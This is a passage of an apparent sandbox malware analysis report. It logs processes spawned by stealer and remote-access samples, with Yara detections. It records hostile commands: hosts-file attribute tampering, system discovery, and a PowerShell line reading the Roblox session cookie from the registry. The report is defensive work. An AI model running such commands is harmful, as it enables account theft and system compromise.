                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                                        Start time:16:10:52
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                        Start time:16:10:52
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                        Imagebase:0x7ff7a3bb0000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                        Start time:16:10:52
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:62
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:63
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                                                                                                                                                                                                                        Imagebase:0x7ff6cc730000
                                                                                                                                                                                                                                        File size:2'759'232 bytes
                                                                                                                                                                                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:64
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:65
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:66
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:67
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:68
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:69
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:70
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:getmac
                                                                                                                                                                                                                                        Imagebase:0x7ff667a60000
                                                                                                                                                                                                                                        File size:90'112 bytes
                                                                                                                                                                                                                                        MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:71
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                        Imagebase:0x7ff7a3bb0000
                                                                                                                                                                                                                                        File size:23'040 bytes
                                                                                                                                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:72
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                                                                                                                                                                                                                        Imagebase:0x7ff7b3a80000
                                                                                                                                                                                                                                        File size:52'744 bytes
                                                                                                                                                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:73
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:74
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:75
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff6d7870000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:76
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:77
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:78
                                                                                                                                                                                                                                        Start time:16:10:54
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:79
                                                                                                                                                                                                                                        Start time:16:10:55
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:80
                                                                                                                                                                                                                                        Start time:16:10:55
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:81
                                                                                                                                                                                                                                        Start time:16:10:55
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe"
                                                                                                                                                                                                                                        Imagebase:0x130000
                                                                                                                                                                                                                                        File size:2'138'232 bytes
                                                                                                                                                                                                                                        MD5 hash:E5F8753995C0B30B827AA2B17F3E1D22
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:82
                                                                                                                                                                                                                                        Start time:16:10:55
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:83
                                                                                                                                                                                                                                        Start time:16:10:56
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                                        File size:810'496 bytes
                                                                                                                                                                                                                                        MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:84
                                                                                                                                                                                                                                        Start time:16:10:56
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                                        File size:810'496 bytes
                                                                                                                                                                                                                                        MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2941270961.0000000001355000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2942245341.000000000135B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:85
                                                                                                                                                                                                                                        Start time:16:10:57
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\Public\Netstat\FuturreApp.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\Public\Netstat\FuturreApp.exe"
                                                                                                                                                                                                                                        Imagebase:0x920000
                                                                                                                                                                                                                                        File size:105'848 bytes
                                                                                                                                                                                                                                        MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\FuturreApp.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:86
                                                                                                                                                                                                                                        Start time:16:10:58
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:87
                                                                                                                                                                                                                                        Start time:16:10:58
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:88
                                                                                                                                                                                                                                        Start time:16:10:58
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:89
                                                                                                                                                                                                                                        Start time:16:11:00
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                        File size:3'037'184 bytes
                                                                                                                                                                                                                                        MD5 hash:CD7686B11754D77B8722880A1A3A9A43
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000059.00000002.2787455438.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000059.00000003.2745055454.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:90
                                                                                                                                                                                                                                        Start time:16:11:00
